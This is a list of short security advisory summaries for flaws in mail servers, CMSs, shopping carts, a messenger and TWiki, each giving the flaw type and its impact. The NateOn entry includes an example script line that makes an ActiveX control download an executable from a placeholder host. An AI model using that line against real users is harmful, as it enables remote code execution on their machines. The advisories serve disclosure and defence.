Merak Mail Server is affected by an arbitrary file deletion vulnerability. This issue arises due to an input validation error allowing an attacker to delete files in the context of the Web server running the application. An attacker can exploit this issue to cause a denial of service condition due to data corruption.
EasyGuppy is prone to a directory traversal vulnerability. The application fails to properly sanitize input supplied through HTTP POST requests or cookies. Exploitation of this vulnerability could lead to a loss of confidentiality as arbitrary files are disclosed to an attacker.
IceWarp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
LucidCMS is prone to an SQL injection vulnerability. An attacker can exploit this vulnerability by entering malicious data into the login and password fields of the login page. This could allow an attacker to gain administrative privileges and potentially compromise the underlying system.
NateOn Messenger is susceptible to an arbitrary file download vulnerability, and a buffer overflow vulnerability. These issues are present in the 'NateonDownloadManager.ocx' ActiveX control that is installed with the application. An attacker would exploit these issues by creating malicious HTML containing script code that accesses the vulnerable ActiveX controls. This issue allows remote attackers to fetch arbitrary remote files and save them on the local machine. The buffer overflow vulnerability allows remote attackers to execute arbitrary machine code in the context of the user running the affected software, facilitating remote system compromise. Attackers may utilize these vulnerabilities in conjunction with each other in order to transfer malicious code to targeted users, and then execute it. To exploit the arbitrary file download vulnerability, a malicious Web page may include the following script code: GotNate.Excute('1','http://www.example.com/somefile.exe','c:windowssystem32cmd.exe');
SquirrelMail Address Add Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
CubeCart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
CubeCart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
lucidCMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
The revision control function of the TWikiUsers script uses the backtick shell metacharacter to construct a command line. An attacker may use a specially crafted URI to execute arbitrary commands through the shell. This attack would occur in the context of the vulnerable application and can facilitate unauthorized remote access.